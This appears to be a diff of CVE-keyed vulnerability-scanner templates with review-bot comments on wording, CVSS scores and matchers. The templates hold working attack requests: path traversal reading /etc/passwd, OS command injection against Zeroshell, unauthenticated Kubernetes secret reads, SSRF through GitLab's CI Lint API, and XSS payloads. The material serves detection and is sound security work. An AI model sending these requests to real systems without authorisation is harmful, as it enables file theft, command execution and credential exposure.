- https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
- https://nvd.nist.gov/vuln/detail/CVE-2017-9140
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
@ -29,3 +32,5 @@ requests:
- '#000000"onload="prompt(1)'
- 'Telerik.ReportViewer.axd?name=Resources'
condition: and
# Enhanced by cs on 2022/02/28

View File

@ -0,0 +1,31 @@
id: CVE-2017-9833
info:
name: BOA Web Server 0.94.14 - Access to arbitrary files as privileges
author: 0x_Akoko
severity: high
description: The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges. Without using access credentials.
reference:
- https://www.exploit-db.com/exploits/42290
- https://www.cvedetails.com/cve/CVE-2017-9833
tags: boa,lfr,lfi,cve,cve2017
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2017-9833
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
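Review bot: the `name` (`Access to arbitrary files as privileges`) and the `description` (`... to read files with root privileges. Without using access credentials.`) are broken English; suggest `BOA Web Server 0.94.14 - Unauthenticated Arbitrary File Read` and a single sentence stating that an unauthenticated GET to `/cgi-bin/wapopen` with `../` sequences in the `FILECAMERA` parameter reads files with root privileges. The `lfr` tag is non-standard next to `lfi`; drop it unless the repository defines it.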

View File

@ -0,0 +1,30 @@
id: CVE-2018-16716
info:
name: NCBI ToolBox - Directory Traversal
author: 0x_Akoko
severity: high
description: A path traversal vulnerability exists in viewcgi.c in the 2.0.7 through 2.2.26 legacy versions of the NCBI ToolBox, which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string.
reference:
- https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md
- https://nvd.nist.gov/vuln/detail/CVE-2018-16716
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-16716
cwe-id: CWE-22
tags: cve,cve2018,ncbi,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,36 @@
id: CVE-2018-18264
info:
name: Kubernetes Dashboard unauthenticated secret access
author: edoardottt
severity: high
description: Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-18264
cwe-id: CWE-306
metadata:
shodan-query: product:"Kubernetes"
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-18264
- https://github.com/kubernetes/dashboard/pull/3289
- https://sysdig.com/blog/privilege-escalation-kubernetes-dashboard/
tags: cve,cve2018,kubernetes,k8s,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"
- "{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: dsl
dsl:
- 'contains(body, "apiVersion") && contains(body, "objectRef")'
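Review bot: the DSL matcher `contains(body, "apiVersion") && contains(body, "objectRef")` is undocumented: a core `v1` Secret response carries `apiVersion`, `kind`, `metadata`, `data` and `type`, not `objectRef`, so either add a comment saying which endpoint shape returns `objectRef` or match on a field the endpoint is known to return (for example `"kind":"Secret"`). Also worth a comment: why the second `/k8s/api/v1/...` path prefix is tried, and that a positive match means the scan has already pulled certificate material out of the cluster, so scan output for this template should be handled as sensitive.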

View File

@ -0,0 +1,31 @@
id: CVE-2018-19365
info:
name: Wowza Streaming Engine Manager Directory Traversal
author: 0x_Akoko
severity: high
description: The REST API in Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request
reference:
- https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html
- https://www.cvedetails.com/cve/CVE-2018-19365
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-19365
cwe-id: CWE-22
tags: cve,cve2018,wowza,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200

View File

@ -0,0 +1,56 @@
id: CVE-2019-10405
info:
name: Diagnostic page exposed Cookie HTTP header
severity: medium
author: c-sh0
description: Jenkins 2.196 and earlier, LTS 2.176.3 and earlier printed the value of the Cookie on the /whoAmI/ URL
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-10405
- https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1505
metadata:
shodan-query: http.favicon.hash:81586312
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.30
cve-id: CVE-2019-10405
cwe-id: CWE-200
tags: cve,cve2019,jenkins
requests:
- raw:
- |
GET {{BaseURL}}/whoAmI/ HTTP/1.1
Host: {{Hostname}}
- |
GET {{BaseURL}}/whoAmI/ HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
req-condition: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- 'text/html'
- 'x-jenkins'
condition: and
case-insensitive: true
- type: word
part: body_2
words:
- 'Cookie'
- 'JSESSIONID'
condition: and
extractors:
- type: kval
kval:
- x_jenkins

View File

@ -2,7 +2,7 @@ id: CVE-2019-12725
info:
name: Zeroshell 3.9.0 Remote Command Execution
author: dwisiswant0
author: dwisiswant0,akincibor
severity: critical
description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
remediation: Upgrade to 3.9.5. Be aware this product is no longer supported.
@ -20,14 +20,17 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27"
- "{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
part: body
regex:
- "((u|g)id|groups)=[0-9]{1,4}[a-z0-9]+"
- "root:.*:0:0:"
# Enhanced by mp on 2022/02/04

View File

@ -22,6 +22,6 @@ requests:
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

View File

@ -0,0 +1,31 @@
id: CVE-2020-13158
info:
name: Artica Proxy before 4.30.000000 Community Edition - Directory Traversal
author: 0x_Akoko
severity: high
description: Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal via the fw.progrss.details.php popup parameter.
reference:
- https://github.com/InfoSec4Fun/CVE-2020-13158
- https://sourceforge.net/projects/artica-squid/files/
- https://nvd.nist.gov/vuln/detail/CVE-2020-13158
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-13158
cwe-id: CWE-22
tags: cve,cve2020,artica,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
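Review bot: The regex `root:[x*]:0:0` only matches a passwd root entry whose password field is exactly `x` or `*`; the other templates touched in this change use `root:.*:0:0:`, which also covers hashed or empty fields. Suggest aligning on the broader pattern for consistency. The matcher also omits `part:`, which is fine since body is the default, but the sibling templates state it explicitly.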

View File

@ -1,16 +1,10 @@
id: CVE-2020-13937
info:
name: Apache Kylin Unauth
name: Apache Kylin Exposed Configuration File
author: pikpikcu
severity: medium
description: |
Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0,
2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4,
2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1,
3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
Kylin's configuration information without any authentication,
so it is dangerous because some confidential information entries will be disclosed to everyone.
description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.
reference:
- https://kylin.apache.org/docs/release_notes.html
- https://s.tencent.com/research/bsafe/1156.html
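Review bot: Tense mismatch in the rewritten description: '... 4.0.0-alpha have one REST API which exposed Kylin's configuration information' mixes present and past. Suggest 'contain a REST API that exposes Kylin's configuration information without authentication'.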
@ -45,3 +39,5 @@ requests:
- kylin.metadata.url
condition: and
part: body
# Enhanced by cs on 2022/02/28

View File

@ -0,0 +1,30 @@
id: CVE-2020-15050
info:
name: Suprema BioStar2 - Local File Inclusion (LFI)
author: gy741
severity: high
description: An issue was discovered in the Video Extension in Suprema BioStar 2 before 2.8.2. Remote attackers can read arbitrary files from the server via Directory Traversal.
reference:
- http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html
- https://www.supremainc.com/en/support/biostar-2-pakage.asp
- https://nvd.nist.gov/vuln/detail/CVE-2020-15050
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.50
cve-id: CVE-2020-15050
tags: cve,cve2020,lfi,suprema,biostar2
requests:
- method: GET
path:
- "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
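Review bot: The CVSS vector and score disagree: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` scores 9.8 (critical), while `cvss-score: 7.50` and `severity: high` correspond to `C:H/I:N/A:N`, which is what an arbitrary file read yields; the vector should end in `.../C:H/I:N/A:N`. Also missing the `cwe-id: CWE-22` that the other traversal templates in this change carry, and the single `condition: and` word matcher on win.ini content has no accompanying status matcher, which is acceptable but worth a deliberate choice.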

View File

@ -9,6 +9,8 @@ info:
- https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683
- http://www.openwall.com/lists/oss-security/2020/01/15/1
- http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html
metadata:
shodan-query: http.title:"GitLab"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10

View File

@ -0,0 +1,56 @@
id: CVE-2020-2103
info:
name: Diagnostic page exposed session cookies
severity: medium
author: c-sh0
description: Jenkins 2.218 and earlier, LTS 2.204.1 and earlier exposed session identifiers on a users detail object in the whoAmI diagnostic page.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-2103
- https://www.jenkins.io/security/advisory/2020-01-29/#SECURITY-1695
metadata:
shodan-query: http.favicon.hash:81586312
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.40
cve-id: CVE-2020-2103
cwe-id: CWE-200
tags: cve,cve2020,jenkins
requests:
- raw:
- |
GET {{BaseURL}}/whoAmI/ HTTP/1.1
Host: {{Hostname}}
- |
GET {{BaseURL}}/whoAmI/ HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
req-condition: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- 'text/html'
- 'x-jenkins'
condition: and
case-insensitive: true
- type: word
part: body_2
words:
- 'Cookie'
- 'SessionId: null'
condition: and
extractors:
- type: kval
kval:
- x_jenkins
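Review bot: The `body_2` matcher requires the literal 'SessionId: null', which contradicts the description ('exposed session identifiers'): a null session id is not a leaked identifier, and the second request reuses the cookie from the first, so a vulnerable instance would be expected to print a real id. Please confirm this is the intended fingerprint (for example, that the vulnerable page prints the label with null for an anonymous session) or switch to a regex that matches a non-null value. Also 'a users detail object' should read "a user's detail object".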

View File

@ -9,12 +9,14 @@ info:
- https://gitlab.com/gitlab-org/gitlab/-/issues/244275
- https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json
- https://nvd.nist.gov/vuln/detail/CVE-2020-26413
tags: cve,cve2020,gitlab,exposure,enum,graphql
metadata:
shodan-query: http.title:"GitLab"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2020-26413
cwe-id: CWE-200
tags: cve,cve2020,gitlab,exposure,enum,graphql
requests:
- raw:

View File

@ -8,12 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/49189
- https://nvd.nist.gov/vuln/detail/CVE-2020-28976
tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast,blind
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2020-28976
cwe-id: CWE-918
tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast
requests:
- method: GET
@ -27,4 +27,4 @@ requests:
- type: word
part: interactsh_protocol
words:
- "http"
- "http"

View File

@ -0,0 +1,30 @@
id: CVE-2020-35234
info:
name: SMTP WP Plugin Directory Listing
author: PR3R00T
severity: high
description: The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access.
remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-35234
- https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/
tags: cve,cve2020,wordpress,wp-plugin,smtp
classification:
cve-id: CVE-2020-35234
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/"
- "{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/"
matchers:
- type: word
words:
- "debug"
- "log"
- "Index of"
condition: and
# Enhanced by cs on 2022/02/28
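Review bot: The second path `/wp-content/plugins/wp-mail-smtp-pro/` probes a different plugin (WP Mail SMTP Pro) from the one this CVE describes (Easy WP SMTP), so a hit on it would be reported under the wrong CVE; drop it or move it to its own template. The word matcher on 'debug', 'log', 'Index of' has no status matcher and no `part:`, and the classification block holds only `cve-id` while the rest of the PR fills in cvss-metrics and score. Wording nit: 'has its log folder remotely accessible and its content available for access' says the same thing twice.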

View File

@ -0,0 +1,38 @@
id: CVE-2020-7943
info:
name: Puppet Server and PuppetDB sensitive information disclosure
severity: high
author: c-sh0
description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information
reference:
- https://puppet.com/security/cve/CVE-2020-7943
- https://nvd.nist.gov/vuln/detail/CVE-2020-7943
- https://tickets.puppetlabs.com/browse/PDB-4876
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2020-7943
cwe-id: CWE-276
tags: cve,cve2020,puppet,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/metrics/v1/mbeans"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "application/json"
- type: word
part: body
words:
- "trapperkeeper"
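Review bot: The description is missing its terminal period, and there is no `remediation:` field even though the first reference is the vendor's own advisory; if that advisory lists fixed versions, they belong here so users know what to upgrade to.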

View File

@ -43,6 +43,5 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by cs on 2022/02/14
# Enhanced by cs on 2022/02/16

View File

@ -13,6 +13,8 @@ info:
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
- https://hackerone.com/reports/1154542
- https://nvd.nist.gov/vuln/detail/CVE-2021-22205
metadata:
shodan-query: http.title:"GitLab"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.90

View File

@ -1,33 +1,49 @@
id: CVE-2021-22214
info:
author: Suman_Kar
author: Suman_Kar,GitLab Red Team
name: Unauthenticated Gitlab SSRF - CI Lint API
severity: high
description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.
description: |
When requests to the internal network for webhooks are enabled,
a server-side request forgery vulnerability in GitLab CE/EE affecting all
versions starting from 10.5 was possible to exploit for an unauthenticated
attacker even on a GitLab instance where registration is limited.
The same vulnerability actually spans multiple CVEs, due to similar reports
that were fixed across seperate patches. These CVEs are:
- CVE-2021-39935
- CVE-2021-22214
- CVE-2021-22175
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-22214
- https://nvd.nist.gov/vuln/detail/CVE-2021-39935
- https://nvd.nist.gov/vuln/detail/CVE-2021-22175
- https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
- https://docs.gitlab.com/ee/api/lint.html
tags: cve,cve2021,gitlab,ssrf,oast
metadata:
shodan-query: http.title:"GitLab"
tags: cve,cve2021,gitlab,ssrf
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.60
cve-id: CVE-2021-22214
cve-id: CVE-2021-22214,CVE-2021-39935,CVE-2021-22175
cwe-id: CWE-918
requests:
- raw:
- |
POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
content-type: application/json
- method: POST
path:
- "{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true"
{"content": "include:\n remote: http://{{interactsh-url}}/api/v1/targets?test.yml"}
headers:
Content-Type: application/json
body: |
{"content": "include:\n remote: http://127.0.0.1:9100/test.yml"}
redirects: true
max-redirects: 3
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
part: body
words:
- "http"
- "does not have valid YAML syntax"
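Review bot: Typo in the new description: 'seperate' should be 'separate'. More substantively, detection changed from an interactsh callback to matching the error string 'does not have valid YAML syntax' after an include of `http://127.0.0.1:9100/test.yml`; that only fires when something on the target is listening on 127.0.0.1:9100 and returns non-YAML, so a host without a service on that port fails the match even if the SSRF is present, and a patched instance that refuses local addresses returns a different error. Please document that assumption in a comment next to the body, and consider whether a status matcher should accompany the single body matcher. Also, `cve-id` now holds a comma-separated list; confirm the annotation tooling accepts that form.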

View File

@ -0,0 +1,43 @@
id: CVE-2021-3002
info:
name: Seo Panel 4.8.0 - Post based Reflected XSS
author: edoardottt
severity: medium
description: Seo Panel 4.8.0 allows reflected XSS via the seo/seopanel/login.php?sec=forgot email parameter.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-3002
cwe-id: CWE-79
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-3002
- http://www.cinquino.eu/SeoPanelReflect.htm
tags: cve,cve2021,seopanel,xss
requests:
- raw:
- |
POST /seo/seopanel/login.php?sec=forgot HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- "<img src=a onerror=alert(document.domain)>"
- "seopanel"
condition: and
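Review bot: Name style: other templates in this change are being renamed from 'XSS' to 'Cross-Site Scripting' (the JustWriting and i-Panel templates, for instance), so 'Post based Reflected XSS' should follow suit, e.g. 'POST-Based Reflected Cross-Site Scripting'. `cvss-score: 6.1` also uses a different format from the two-decimal `6.10` used elsewhere in the PR.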

View File

@ -3,12 +3,17 @@ id: CVE-2021-3654
info:
name: noVNC Open Redirect
author: geeknik
severity: low
severity: medium
description: A user-controlled input redirects noVNC users to an external website.
reference:
- https://seclists.org/oss-sec/2021/q3/188
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3654
tags: redirect,novnc,cve,cve2021
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-3654
cwe-id: CWE-601
requests:
- method: GET

View File

@ -8,12 +8,12 @@ info:
reference:
- https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316
tags: wordpress,cve2021,cve,lfi,wp-plugin
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-39316
cwe-id: CWE-22
tags: wordpress,cve2021,cve,lfi,wp-plugin,zoomsounds
requests:
- method: GET
@ -29,4 +29,4 @@ requests:
- type: status
status:
- 200
- 200

View File

@ -1,10 +1,11 @@
id: CVE-2021-40868
info:
name: Cloudron 6.2 Cross Site Scripting
name: Cloudron 6.2 Cross-Site Scripting
author: daffainfo
severity: medium
description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to Reflected XSS.
description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting.
remediation: Upgrade to Cloudron 6.3 or higher.
reference:
- https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-40868
@ -35,3 +36,5 @@ requests:
words:
- '</script><script>alert(document.domain)</script>'
part: body
# Enhanced by mp on 2022/03/06

View File

@ -1,11 +1,12 @@
id: CVE-2021-40870
info:
name: Aviatrix Controller 6.x before 6.5-1804.1922. RCE
name: Aviatrix Controller 6.x before 6.5-1804.1922 Remote Command Execution
author: pikpikcu
severity: critical
description: Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
description: Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal.
reference:
- https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021
- https://wearetradecraft.com/advisories/tc-2021-0002/
- https://nvd.nist.gov/vuln/detail/CVE-2021-40870
tags: cve,cve2021,rce,aviatrix
@ -41,3 +42,5 @@ requests:
- "PHP Extension"
- "PHP Version"
condition: and
# Enhanced by mp on 2022/03/06
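Review bot: The new description reads 'contains a vulnerability that allows unrestricted upload ..., which allows an unauthenticated user ...'; the doubled 'allows' can be avoided with 'contains an unrestricted file upload vulnerability that allows an unauthenticated user to execute arbitrary code via directory traversal'.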

View File

@ -1,16 +1,16 @@
id: CVE-2021-40875
info:
name: Gurock TestRail Application files.md5 exposure
name: Gurock TestRail Application files.md5 Exposure
author: oscarintherocks
severity: medium
description: Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data.
description: Improper access control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data.
tags: cve,cve2021,exposure,gurock,testrail
reference:
https://github.com/SakuraSamuraii/derailed
https://johnjhacking.com/blog/cve-2021-40875/
https://www.gurock.com/testrail/tour/enterprise-edition
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875
- htttps://github.com/SakuraSamuraii/derailed
- https://johnjhacking.com/blog/cve-2021-40875/
- https://www.gurock.com/testrail/tour/enterprise-edition
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875
classification:
cve-id: CVE-2021-40875
metadata:
@ -34,3 +34,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/06
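Review bot: The first new reference line has a typo in the scheme: `htttps://github.com/SakuraSamuraii/derailed` (three t's) will not resolve and should be `https://`. Converting the bare URLs to `- ` list items is the right fix for the `reference:` block.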

View File

@ -30,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/06

View File

@ -1,14 +1,15 @@
id: CVE-2021-40978
info:
name: mkdocs 1.2.2 built-in dev-server allows directory traversal
name: MKdocs 1.2.2 Directory Traversal
author: pikpikcu
severity: high
reference:
- https://github.com/mkdocs/mkdocs/pull/2604
- https://github.com/nisdn/CVE-2021-40978
- https://nvd.nist.gov/vuln/detail/CVE-2021-40978
tags: cve,cve2021,mkdocs,lfi
description: "** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1."
description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
@ -31,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/06
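Review bot: Product name casing: the project writes it 'MkDocs', not 'MKdocs' (the old text had lowercase 'mkdocs'); fix in both `name:` and `description:`. 'Note the vendor has disputed' should read 'Note that the vendor has disputed'. Since the dispute is that the dev server is only exposed when deliberately run publicly, consider whether `severity: high` still fits.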

View File

@ -1,10 +1,11 @@
id: CVE-2021-41174
info:
name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering XSS
name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting
author: pdteam
severity: medium
description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.
remediation: Upgrade to 8.2.3 or higher.
reference:
- https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8
- https://nvd.nist.gov/vuln/detail/CVE-2021-41174
@ -43,4 +44,6 @@ requests:
- type: regex
group: 1
regex:
- '"subTitle":"Grafana ([a-z0-9.]+)'
- '"subTitle":"Grafana ([a-z0-9.]+)'
# Enhanced by mp on 2022/03/06

View File

@ -5,7 +5,8 @@ info:
author: alevsk
severity: critical
description: |
Minio console is a graphical user interface for the for MinIO operator. Minio itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled. All users on release v0.12.2 and before are affected and are advised to update to 0.12.3 or newer. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token.
MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled.
remediation: "Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token."
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-41266
- https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36
@ -43,4 +44,6 @@ requests:
- type: word
part: header
words:
- "token"
- "token"
# Enhanced by mp on 2022/03/06
